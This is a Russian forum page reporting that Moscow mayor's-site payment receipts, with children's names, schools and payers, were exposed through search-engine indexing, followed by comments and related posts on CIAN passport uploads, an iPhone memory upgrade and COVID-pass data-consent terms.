461

Утечка данных на сайте мэрии Москвы

Утечка данных на сайте мэрии Москвы Москва, Мэрия, Персональные данные, Информационная безопасность, Кибербезопасность

На сайте мэрии города Москвы оказались скомпрометированными персональные данные десятков тысяч жителей Москвы и их детей.


Так, например, каждый желающий может обнаружить в выдаче поисковых систем платежки, которые подтверждают факт оплаты тех или иных развивающих детских секций через сайт мэрии Москвы, с указанием образовательного учреждения, секций, суммы оплаты, имени ребенка и имени плательщика. Так же, можно найти огромное количество платежек за нарушения ПДД, с указанием номера постановления и суммы оплаты, оплаты ЖКУ, и прочие.

https://yandex.ru/search/?text=%D0%BE%D0%BF%D0%BB%D0%B0%D1%8...


Эксперт по кибербезопасности

Константин Живенков

Дубликаты не найдены

Отредактировала ltomme 1 год назад
+78

- Шеф! У нас дыра в безопасности!!!111

- Слава богу. У нас хоть что-то в безопасности...

+33

И правда работает.
Звоните Яровой и Жарову.

раскрыть ветку 4
+21
Иллюстрация к комментарию
+4
Это вы еще на сайте псп не искали. Я про приставов.
раскрыть ветку 2
-2

а что там? кроме ФИО и номера исполнительного производства там особо ничего нет. тут другой немного случай. имя ребенка. имя родителя. номер школы. наименование секции. сумма оплаты. дата оплаты. собрав все это в кучу, и дополнив это копией квитанции можно всякого напридумывать, не особо приятного для родителей... поэтому, сайты приставов это не совсем корректное сравнение

раскрыть ветку 1
+14

Никогда такого не было, и вот опять :)


Я про индексацию поисковиками яндекс-доков и гугл-доков.

раскрыть ветку 2
0

Пока в гос.конторах работают "за идею" либо "за откат" всё так и будет продолжаться.

раскрыть ветку 1
0

Да если бы только в госконторах. Этой фигни с яндекс- и гугл-доками и у частников не меньше.

+41

Главное что сайт Навального заблокировали за, внимание, наличие счетчика ГуглАналитики. А то информация о количестве посетителей хранится на серверах в аж в самом США!

раскрыть ветку 7
+1

Пиздёж. Метрикой все пользуются. А у него было несколько нарушений федерального закона номер 115 "О персональных данных", за каждое из которых можно было заблокировать. А уж по совокупности --"Надо Федя. Надо".

Пруф: https://dostalo.livejournal.com/953696.html

раскрыть ветку 5
+3

Ууу, проклятый Навальный нарушил законодательство, а данные спиздили с сайта мэрии москвы. Как же так получилось? Пока ваши (не ваши на самом деле) доводы не проверял к сожалению, насколько они обоснованы. Давайте предположим что вы (ваш источник) правы на 100%. И на сайте действительно неверно прописана политика конфеденциальности. Привело ли это к реальному вреду гражданам и утечке их персональных данных?  Нет и скорее всего не приведет. По крайней мере если утечка и произойдет, то не по причине неправильно прописанной политики. Прописана ли такая политика на сайте московской мэрии? Скорее всего да( не проверял, но давайте примем как данность что там все в порядке с точки зрения оформления). Помогло ли это сохранить персональные данные москвичей? Как мы видим нет. Оказывается, если даже ты заявляешь на сайте что ты правильно хранишь данные в соответствии с законом, это не предотвращает реальные нарушения прав граждан. У нас есть суд. Суд должен защищать права граждан. Тем не менее в реальности права граждан были нарушены на сайте мэрии Москвы, а суд, по формальным основаниям, закрывает сайт Навального? Не кажется ли вам, что совоеменное законодательство вовсе не стремится защитить реальные права граждан в этом случае? Более того, скорость реагирования на вновь созданный сайт скорее говорит нам о том, что закон о персональных данных больше используется как инструмент политического давления, чем реальный инструмент защиты прав граждан.

раскрыть ветку 4
-1

Опечатался, ФЗ-152, конечно же.

+9

А "эксперт по кибербезопасности" в курсе, что для начала нужно уведомить тех, у кого возникла "дыра в безопасности", дождаться ее устранения (либо официального ответа, что так и было задумано), а только потом, месяца через два (или сколько займет устранение) выкладывать найденное в общий доступ? И что оправдание "я хотел предупредить окружающих о том, что их данные в сети" не прокатит, т.к., во-первых, вы оповещаете злоумышленников, а во-вторых, их данные и так уже в сети.

раскрыть ветку 21
+7

Дыра закрыта. Осталось поиск вычистить от фамилий.

{"errorDescription":"Session is expired or lost"}

Иллюстрация к комментарию
+4

Чот "эксперт" не гуглится, только какой-то рекламщик.

+5

А эксперт не несёт ответственности за сохранность дыры, так что может поступать, как ему хочется.

-11

непонятно отчего вы так нервничаете...

раскрыть ветку 17
+5

Где в моих словах вы увидели, что я нервничаю? Мне по этой "дыре" нет смысла переживать - не в Москве живу, не я нашел, не я создал, не мне нести ответственность, использовать не собираюсь. Просто вы гордо себя назвали "экспертом по кибербезопасности", а элементарные правила не соблюли или соблюли, но умолчали об этом. Либо не называйте себя "экспертом", либо ведите себя профессионально. А то развелось "экспертов", которые на проверку оказываются обычными менеджерами, разбирающимися в теме на уровне "прослушал недельный курс, дыры - плохо, безопасность - хорошо".

ещё комментарии
ещё комментарии
+1
Эксперт по кибербезопасности

А существует какая либо объективная оценка твоей "экспертности"? Ну там сертификат от любого вендора в ветке секьюрити или еще что?

ещё комментарии
+1

яндекс уже закрыл эти доки.

0

я конечно понимаю, что такого быть не должно и кому надо небось влетит, но что такого в утечке этих данных? как ими можно воспользоваться в своих целях?

раскрыть ветку 2
0
Можно вычислить злостных неплатильщиков и за пузырь купить у них квартиру
-5

Ну, представим, что обнаружилась квитанция, где написано что гражданин 1234 Сергей Иванович оплатил секцию детской гимнастики для дочери своей 1234 Алены Сергеевны, которая учится в средней школе 1218 г.Москва.

И вот какой-нибудь Вася, узнав по каким дням проходит эта секция, берет эту квитанцию, приходит в школу 1218 и говорит: Бонжур, дамы и господа. Тут меня Сергей Иванович попросил с секции детской гимнастики забрать дочь его Алену Сергеевну. Он на работе сегодня. Не могет. Ах, да... В этом месяц мы заплатим чуть раньше. В прошлом платили 12го числа, а в этом заплатим 10го. Алена Сергеевна, позвольте на выход. Сергей Иванович, папенька ваш, ждет всенепременнейше вас дома.

Возможно, для кого-то из воспитателей/учителей данной информации будет достаточно, чтобы отдать ребенка незнакомому человеку. Ведь он знает и как папу зовут, и где ребенок занимается, и даже в курсе когда и за что Сергей Иванович денег заносит в школу енту... И даже ведь квитанция у него есть.

Ну, то есть, для сумачеччих это достаточный объем данных, чтобы исполнять всякое... Оттого и боязно.

ещё комментарий
0

@moderator, помогите пожалуйста с тегами, пытаюсь заменить "кибербезопасТность" на "кибербезопасность", ничего не получается.

раскрыть ветку 3
+2

Спасибо, что сообщили)

Исправили, поставили.

-6

Увы. Редактирование постов доступно пользователям с рейтингом более 5000 баллов.

Тег "КибербезопасТность" выскочил в подсказках к тегам. Не обратил внимание на Т, соррян.

раскрыть ветку 1
0

Да у меня тоже выскакивает и нельзя ничего сделать. Тут похоже какая-то техническая проблема.

ещё комментарии
0

уже закрыли дыру

раскрыть ветку 1
+1

А кеши поисковиков почистили?

0

А для других городов такие сайты есть?

0

Ебать, Живенков. У тебя же бизнес в Таиланде?

ещё комментарии
-1

Охуеть, и правда платежки со всеми реквизитами, ВВ вопрос, срочно!

-4

как программист говорю ничего не взламываемого нет есть лиш время чтобы придумать как обойти всякий код

раскрыть ветку 1
+1

Ну, ну. Взломай https. Сразу миллиардером станешь.

-6

Да вы чтооооо, это.. это же... я теперь могу получить инфу о любом нарушителе ПДД и узнать сколько штрафов кто оплатил!!!!  Ну охуеть теперь.

раскрыть ветку 18
+3

Вы прикладываетесь? Даже этого впрлне достаточно.

раскрыть ветку 4
0

Не впрлне!

-3

Обычно прикладываются ко мне.

раскрыть ветку 2
-6

на нарушителей можно в целом забить. но можно ли забить на квитанции, где указано имя ребенка, образовательное учреждение в котором он учится, его спортивные и прочие секции, имя родителей в качестве плательщиков?

раскрыть ветку 12
+1

Простите, плохо с фантазией к концу недели, а кому эта информация может понадобиться?

раскрыть ветку 3
+1

Я могу.

0

Я не понял. Если всё выдаётся в таком виде, который на фото, то утечки персональных данных нет т.к. исключительно по ФИО невозможно установить личность гражданина, а остальные идентификаторы частично закрыты XXXX

раскрыть ветку 6
ещё комментарии
-9

Дыру оперативненько убрали. Пожалуй, на этом и закончим.

ещё комментарии
-1

У вас еще есть желание использовать яндекс.браузер?)

-1
Не может быть! Это не было запланировано, не былооооо. Значит не правда.
Похожие посты
255

Решение ошибки 14 на примере Iphone 11 Pro

Здрасти!
С Вами снова нудная выскочка (да, именно так окрестили меня в профессиональных кругах xD) и сейчас я расскажу о бесплатно-платном решении вопроса, связанного с ошибкой 14, которая возникает из за недостаточного килобайта места при полной забитой памяти устройства или неисправного nand накопителя.
Начальные симптомы происходят у всех одинаково: 64gb памяти на устройстве от эпл забиты допустим на 94.86%, т.е остаётся примерно 1-2gb свободного места но это место мнимое. Вы пользуетесь и бед не зная решили пофоткать играющего котика и тут закончилось свободное место...
А кот до сих пор играется и нужно срочно его дофоткать! Начинаете удалять фотографии, а они не удаляются:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Глюк думаете вы и перезагружаете телефон. В этот момент система начинает запуск и берёт часть свободного места для своих нужд: принцип файла подкачки на ПК, но объёма ей не хватает и происходит перезапуск на яблоке...
И пока кот жгёт брейк

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Вы наблюдаете дорогой логотип компании на дисплее)

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Что в этом случае делать?
Ведь там очень много фотографий и нужно их срочно не потерять.
Для начала дать им шанс на перепрошивку с сохранением данных.
Для этого нужно вывести телефон из ребута и перевести его в рекавери или dfu.
Это бесплатное решение на авось поможет или нет.
Но как быть, если в некоторых случаях система не отзывается на кнопки громкости?
В данном случае на примере 11 Pro мне так же не удалось ввести телефон в режим прошивки при помощи кнопок.
Далее следует решение платное:
Разбираю телефон:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

И через u2 tester принудительно перевожу брусок в режим восстановления.
Прошиваю без потери данных:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Это фиаско. Данных больше нет. На этом этапе остаётся шить память в систему начисто, что бы системная память сделала себе новую переразметку. В данном случае память не вышла из строя, а нормально прошилась:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Но бывают случаи, причем не так редко, когда даже полная прошивка не помогает и в этих случаях приходится менять чип памяти.
Что же делать, что бы избежать этой коварной ошибки в будущем?
1. Не забивать память до конца, оставляя 3-5gb и сильно следить за ними.
2. Купить новый девайс за сотку с чуть большим количеством памяти.
3. Прошить телефон на больший объём памяти :D
Чем я и займусь)
Так как данных больше нет, а клиент решил сэкономить не лишние 1700$, то вычитываю калибровки из абсолютно рабочего телефона

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

И записываю их в чип побольше.
Частый вопрос:
"А чип новый оригинальный?"
Нет, новых оригинальных нет!
Есть либо снятые оригинальные, либо новые копия. Но разницы в них никакой, скорости одинаковы. Но китайцы предпочитают больше снятые, чем новые.
Я использую первые. Снятые б.у)
В данном случае этот чип снят или украден, кому как нравится, но в моём случае куплен у китайца в китае.
Потом всё по накатанной.
Извлекаю плату из корпуса:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Отклеиваю подушки безопасности

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

И подготавливаю плату к "кустарщине в подвале у дядюшки Сэма"

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Распил денег поше́л xD

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Из чего же состоит чип?
Из контроллера и банок памяти, как обычная флешка, только меньше и быстрее)

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

По краям расположены кристаллы банок. Они могут быть одним слоем или несколькими в зависимости от встроенного объёма, а внизу кристалл - сам контроллер. Тут чип был на 128gb, а вот к примеру с 11 Pro Max на 64gb, который только сегодня сделал:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Допиливаю эту красоту до основания и убираю бортики чипа по краям паяльником:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Счищаю оставшийся компаунд вот таким ножиком)

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Получается так:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Чуть косякнул и повредил слой маски на самой плате, но это не страшно. На китайском ноже был заусенец и пришлось его потом перезаточить.
Исправляю:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

А дальше всё просто, припаиваю чип с записанными калибровками на двухэтажную плату:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Привожу плату в более менее презентабельный вид очищая и возвращая отклееные ранее подушки:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

К прошивке готов)

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Так как айфон сравнительно новый, то заводская проклейка дисплея в большинстве случаев сохраняется в отлично и менять её на китайскую нет смысла. Ориг всё же лучше приклеивается даже при однократном отклеивании) Защита от пыли и брызг точно выдержит, но длительные погружения не уверен)

Это как: да он чуть уголком в воде секунду был:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Собираю, клею гарантии:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Айхвон 11 pro на 512gb готов:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

3 часа времени и 12000 рублей дома)

Следите за своим местом...

в телефоне xD

А то данные на 2020 ещё не вернуть с такого чипа.


А вот так выглядит полностью разобранная прошка, если вдруг кому станет интересно:

Решение ошибки 14 на примере Iphone 11 Pro Москва, Распил, Apple, iPhone, iPhone 11, Персональные данные, Пайка, Увеличение памяти, Техническая новинка, Ремонт телефона, Длиннопост

Как нибудь потом расскажу как не нужно стрелять из оружия в телефон)


P.s: прошки ещё на гарантии. Были...


Моя инста, если кого то заинтересует спросить вопрос и...

Увидимся)

Показать полностью 23
113

Очень странные дела при подаче объявлений на ЦИАН

UPD. Как и писал в конце поста – если мне покажут, где я ошибся, я посыплю голову пеплом.

Нужно отдать должное специалистам Циан – очень быстро отреагировали и разложили все по полочкам. Привожу их объяснения без изменений:

Олег Масленников, Архитектор ИБ Циан:

«Занимаюсь безопасностью в Циан, хочу обратить внимание на пару фактических и технических ошибок в статье. Во-первых, утверждается, что данные «улетают» и обрабатываются заграничным сервисом. Это не так. Мы используем компанию Sumsub, это глобальная организация с HQ в Лондоне и офисами в тч в России, работающая в соответствии с законодательством Российской Федерации.

Российские паспорта обрабатываются российским юридическим лицом компании, ООО «Технологии цифровой безопасности» (sumsub.ru).

Информация о хранении:

— Ссылка на соответствующий раздел сайта: sumsub.ru/security

— Хранение по требованиям РКН: в соответствии с уведомлением, отправленным в РКН, персональные данные хранятся в ЦОДе компании «Селектел», в базе данных, доступ к которой разграничен средствами защиты информации, сертифицированными ФСТЭК России.

— ООО «Технологии цифровой безопасности» внесена в реестр Операторов ПДн Роскоомнадзора под регистрационным номером 78-17-003488 10.03.2017.

Во-вторых, про то, что данные уходят на сервер, который физически находится в Америке. Для защиты сайтов и сервисов Sumsub использует систему CloudFlare. CloudFlare является прокси, поэтому у них всегда один IP, но маршрут данных, при этом, идет в ближайший ДЦ. В России таких ДЦ два – в Москве и Санкт-Петербурге. Вы можете легко проверить этот маршрут с помощью traceroute.»

Добавлю, что подразделение безопасности cian.ru оказалось на удивление открытым и готовым обсуждать вопросы по безопасности.



TL;DR При загрузке паспорта на сайт cian.ru он «улетает» к заграничному сервису распознавания лиц на api.sumsub.com


Преамбула

И снова здравствуйте. Возможно шапочка из фольги снова давит голову, но есть вопросы и подозрения, которыми хотелось бы поделиться с вами. В одном из прошлых постов была показана странная и спорная «фича» в почтовике mail.ru. Новый день принёс новые открытия. На этот раз доброжелатель пожелал остаться анонимным. Но всё равно спасибо ему за то, что поделился фактурой.


Cian.ru – сайт, позиционирующийся как «достоверная база данных о продаже и аренде жилой, загородной и коммерческой недвижимости» и принадлежащий «ЦИАН. Групп». Ресурсы этой компании довольно популярны. Компания заявляет, что она – «Лидер онлайн-недвижимости России (по количеству посещений сайта cian.ru пользователями сети Интернет по данным LiveInternet в разделе «Недвижимость» по состоянию на 12 марта 2020 г.). Всё это есть в подвале сайта. Интересно другое.


Пару лет назад в Сети начали появляться вопросы относительно нового требования от ресурса: пользователь должен загрузить свой паспорт. Беглый гуглёж сразу приводит нас в справочный раздел, где перечислены необходимые действия для идентификации и поясняется, почему это хорошо.

Тем не менее, пользователи выказывали опасения (раз, два, три и т.д.), т.к. набор данных состоит как минимум из паспортных данных + скан паспорта РФ + фото с раскрытым паспортом в руке. Это для физлиц. Если вы ИП или Юрлицо, данных нужно ещё больше.


Но довольно лирики. Посмотрим, что будет, если пользователь просто подаёт объявление на продажу квартиры.


Фабула

Смотреть действия будем через нашу DLP. Интерес в первую очередь представляет перехват с модулей HTTPController и MonitorController. Думаю, из названия понятно, что каждый из них перехватывает. Заранее прошу прощения за качество скринов. На данный момент никто из сотрудников квартиру не продаёт, поэтому полностью воспроизвести кейс у себя не смогли. Показывать и пояснять будем на «боевой» системе.


Итак, отсортируем перехват с двух каналов по времени, чтобы чётко видеть хронологию действий.


Действие 1. Человек заходит на cian.ru, начинает подавать объявление. Видно в перехвате по http, что полетели фото. 4 штуки (строки №6-9 на скриншоте).

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

Сразу же можно, не отходя от кассы, посмотреть вложение, которое улетело к cian.ru. Убеждаемся, что грузятся фото интерьера квартиры.

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

Перехват MonitorController’a (строка №10) всё подтверждает. Виден браузер, видны 4 загруженных фото, видны эти же фото в теле объявления.

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

Действие 2. Наступает интересный момент. После загрузки фото летят разные пакеты да по разным местам. Что-то на api циана, что-то в mail.ru, что-то в facebook. Зачем? Не знаю. Но явного криминала тут не нашли. Наконец, наступает момент, когда появляется шаг с подтверждением личности.

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

Некоторые читатели возможно задаются вопросом, а как это так удачно и в нужное время система скрины делает? Всё просто. У MonitorController’a есть опция «Делать скрин при смене активного окна». Здесь мы видим как раз такую ситуацию: человек нажимает кнопку, чтобы добавить фото, открывается окно, система реагирует. Никакого колдунства.


Взглянем на скрин поближе.

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

Если вы следили внимательно, то могли запомнить, что этот скрин находился на строке №27. Что же дальше по хронологии? Строка №28 спешит убить интригу – человек добавил свой паспорт. Но!

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

Вы только посмотрите, что творят канадцы! (а может и не они). Паспорт улетает на api.sumsub.com. Можно убедиться, открыв в перехвате сам файл.

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

Осталась последняя надежда. Может этот сервис обрабатывает изображения в России? Хотелось бы драматически бросить в зал доказательства, но если быть честным, то надо быть им до конца. В данном случае наша DLP в качестве IP получателя фиксировала адрес прокси-сервера.


Поэтому предлагаю самим вам убедиться, когда улетают ваши паспорта при подаче объявлений. Со своей стороны могу в команду «ping –a», которая выдала «104.26.10.41».

Очень странные дела при подаче объявлений на ЦИАН Утечка данных, Паспорт, Циан, Информационная безопасность, Персональные данные, Длиннопост

В целом, в этот светлый сисадминский праздник, который к тому же ещё и пятница(!) хотелось бы верить в то, что я где-то ошибся или недопонял. Что ж, в таком случае, готов буду посыпать голову пеплом, публично извиняться и учить матчасть. А пока, призываю сообщество самостоятельно проверить изложенные факты и по возможности поделиться результатами.

P.S. Мой оригинал поста на Хабре.

UPD к посту имеются вопросы: #comment_176036026

Показать полностью 8
724

Как попасть в комиссию по уничтожению данных системы цифровых пропусков ? Наблюдателем

Вот заявил Собянин, что использование данных, которые собирались для введения цифровых пропусков в Москве, возможно только в чрезвычайных ситуациях. Поэтому, когда эпидемия кончится, их уничтожат."После окончания эпидемии все данные о гражданах, которые были внесены в систему цифровых пропусков и приложение «Социальный мониторинг», уничтожат". Об этом заявил мэр Москвы Сергей Собянин, передает ТАСС.

Вот хочу посмотреть, что значит "Уничтожить" и как подтверждается отсутствие копий.

Будут торжественно во дворе мэрии флешку сжигать или танк подгонят, чтобы раздавить.

Или запустят Delete ? А вдруг форматнут серверный диск. 

И покажут бумажку с подписью, что "Копий нет".

А потом подпишут протокол и устроят фуршет?

Как это будет проходить? Чем подтверждаться и как контролировать?

Как попасть в комиссию по уничтожению данных системы цифровых пропусков ? Наблюдателем Сергей Собянин, Москва, Персональные данные
4698

Москвичи, оформляющие цифровой пропуск дают разрешение на отправку рекламы в течение 10 лет

ФЕЙК: https://tass.ru/moskva/8553717

https://tass.ru/obschestvo/8563413

В согласии на обработку персональных данных, которое в обязательном порядке необходимо подписать при проверке пропусков на передвижение по Москве, есть пункт, позволяющий Департаменту информационных технологий свободно передавать эти данные третьим лицам. На это обратили внимание в блоге AnalogBytes Conference на «Хабре».


Соглашение, которое необходимо принять при проверке информации об аннулировании пропуска на сайте i.moscow/covid, подразумевает передачу данных о ФИО, адресе, месте работы, должности, гражданстве, номере телефона и электронной почте в том числе третьим лицам. Эти данные, указано в соглашении, могут использоваться для отправки материалов рекламного характера как от властей Москвы, так и от третьих лиц в течение десяти лет.



На эту тему был пост о сове - эффективном менеджере, и под ним комментарий с ссылкой на Хабр, но он не получил достаточного освещения.

UPD от @god31 #comment_170345154:

куда писать, чтобы отозвать согласие на обработку персональных данных. Людям будет полезно.
_________________________________________________________________________________________
Шаблон заявления - https://docs.google.com/document/d/1iN5fZWRPhUBk1iQPignBwKHr...

Заявление необходимо отправить заказным письмом с уведомлением о вручении по следующим адресам:
Руководителю Департамента предпринимательства и инновационного развития города Москвы Фурсину А.А.
125009, г. Москва, Романов переулок, д.4 стр.2
dpir@mos.ru
Руководителю Департамента информационных технологий города Москвы Лысенко Э.А.
123112, г. Москва, 1-Красногвардейский проезд, д. 21, стр. 1
dit@mos.ru
Генеральному директору ГКУ г. Москвы «Информационный город» Дзенгану А.Н.
123112, г. Москва, 1-Красногвардейский проезд, д. 21, стр. 1
ig@it.mos.ru
ВРИО генерального директора Фонда «Московский инновационный кластер» Валетову А.И.
125009, г. Москва, Вознесенкий пер., д. 22
support@i.moscow
59

ДИТ Москвы при проверке пропуска получает разрешение на отправку рекламы на следующие 10 лет

Одна из вещей, которые никогда не делают пользователи — это чтение до конца лицензионных соглашений. Тем временем, читать их стоит, даже если, казалось бы, в контексте конкретного сервиса их содержание представляется очевидным.

К таким «очевидным» сервисам относится, например, сервис проверки цифрового пропуска https://i.moscow/covid. Если раньше он позволял проверить только организацию по ИНН, то с недавних пор ДИТ Москвы стал массово аннулировать пропуска горожанам за якобы предоставление неверных сведений о месте работы — и отсылать их для подтверждения места работы на указанный сервис.

При нажатии на «Если у Вас заблокировали цифровой пропуск, перейдите по ссылке» сервис выдаёт просьбу ввести сначала номер паспорта, а потом ИНН компании, сопровождаемую непримечательной галочкой:

ДИТ Москвы при проверке пропуска получает разрешение на отправку рекламы на следующие 10 лет Персональные данные, Информация, Москва, Мэр, Полезное, Длиннопост, Habr

Абсолютное большинство людей проставят её, не читая сопутствующий документ — и очень зря.

Если говорить коротко, все граждане, попавшие на этот сервис, подписываются на передачу абсолютно всех данных, которые сервис в принципе способен о них собрать — от IP-адреса до номера паспорта и названия работодателя — любым третьим лицам с практически любыми целями, включая рассылку рекламы, на срок в 10 лет.

По ссылке открывается PDF-файл (https://abconf.ru/wp-content/uploads/2020/05/согласие_на_обработку_персональных_данных-2-1.pdf на всякий случай), гласящий — выделение наше:

Настоящим подтверждаю свое согласие на осуществление Департаментом предпринимательства и инновационного развития города Москвы, Департаментом информационных технологий города Москвы (ОГРН 1107746943347, адрес 123112, г. Москва, 1-Красногвардейский проезд, д. 21, стр. 1), государственным казенным учреждением города Москвы «Информационный город» (ОГРН 5147746224324, адрес 123112, г. Москва, 1-Красногвардейский проезд, д. 21, стр. 1), Фондом «Московский инновационный кластер» (ОГРН 1197700007141, адрес: 125009, г. Москва, Вознесенский переулок, д.22) (далее – оператор) обработки следующих моих персональных данных:
фамилия, имя, отчество; дата рождения; адрес; профессия; место работы, адрес организации, иная информация о трудовой деятельности; должность в организации; данные документа, удостоверяющего личность, гражданство, образование; номера телефонов; адрес электронной почты;; технические данные, которые автоматически передаются устройством, с помощью которого используются информационные системы и (или) сайт оператора (в том числе технические характеристики устройства (идентификатор устройства), IP-адрес, файлы «cookies», информация о браузере и др.), в том числе на осуществление следующих действий: обработка (включая сбор, систематизацию, накопление, хранение, уточнение (обновление, изменение), извлечение, использование, обезличивание, распространение и передачу третьим лицам, блокирование, уничтожение персональных данных),
в целях проверки достоверности данных цифрового пропуска для передвижения по городу Москве, коммуникации со мной оператора и (или) третьих лиц, в том числе при моем обращении к оператору; в том числе смс и e-mail рассылок посредством указанных мною в настоящем согласии номеров телефона и (или) адреса электронной почты, направления мне новостных материалов оператора и (или) третьих лиц; получения от оператора и (или) третьих лиц по сетям электросвязи информации (материалов информационного и (или) рекламного характера)
Настоящим подтверждаю свое ознакомление с тем, что оператор, осуществляющий обработку моих персональных данных, вправе в соответствии с частью 3 статьи 6 Федерального закона от 27 июля 2006 г. №152-ФЗ «О персональных данных» поручить обработку моих персональных данных другому лицу на основании заключаемого с этим лицом договора, в том числе государственного контракта, либо путем принятия соответствующего акта.
Настоящее согласие выдано мной сроком на 10 (десять) лет. Настоящее согласие может быть отозвано путем составления мной в письменной форме требования о прекращении обработки моих персональных данных, направленного в адрес оператора заказным письмом с уведомлением о вручении, либо иным доступным способом, позволяющим подтвердить факт его получения. Также подтверждаю, что представленная мной при регистрации в информационной системе обеспечения деятельности инновационного кластера на территории города Москвы или на сайте оператора контактная информация совпадает с контактной информацией субъекта персональных данных для предоставления информации об обработке персональных данных, а также в иных случаях, предусмотренных законодательством Российской Федерации.
Комментировать это всерьёз, честно говоря, трудно — либо структуры Правительства Москвы решили единомоментно утратить остатки совести и немного подзаработать, либо, как обычно, текст составляло молодое гуманоидное существо, только начинающее свой путь в профессии и внёсшее в него вообще всё, что существу удалось найти в гугле, просто на всякий случай.

Напомним, что когда 31 марта ДИТ Москвы выложил в Google Play первую версию приложения «Социальный мониторинг» (по некоторым сведениям https://www.apn.ru/index.php?newsid=38289, переделанным из приложения контроля водителей мусоровозов), в нём так же «на всякий случай» при установке требовались разрешения примерно на всё https://habr.com/ru/news/t/495088/?_ga=2.177798624.453077886..., до чего приложение в принципе может дотянуться в смартфоне, а данные передавались по нешифрованному протоколу на обработку эстонской компании с серверами в Германии.

Тем не менее, между галочками в приложении и официально подписываемым пользователем в рамках действующего законодательства согласием есть существенная разница — которую, кажется, в структурах Правительства Москвы не понимают.

Юристам ещё предстоит дать правовую оценку происходящем, мы же настоятельно советуем — если вы в принципе, хотя бы один раз пользовались сервисами i.moscow или nedoma.mos.ru, в первый же день после отмены в Москве пропускного режима (либо, если вы больше не планируете пользоваться пропусками, то завтра) дойти до ближайшего отделения почты и отправить заказным письмом отзыв согласия на обработку персональных данных перечисленным выше организациям.

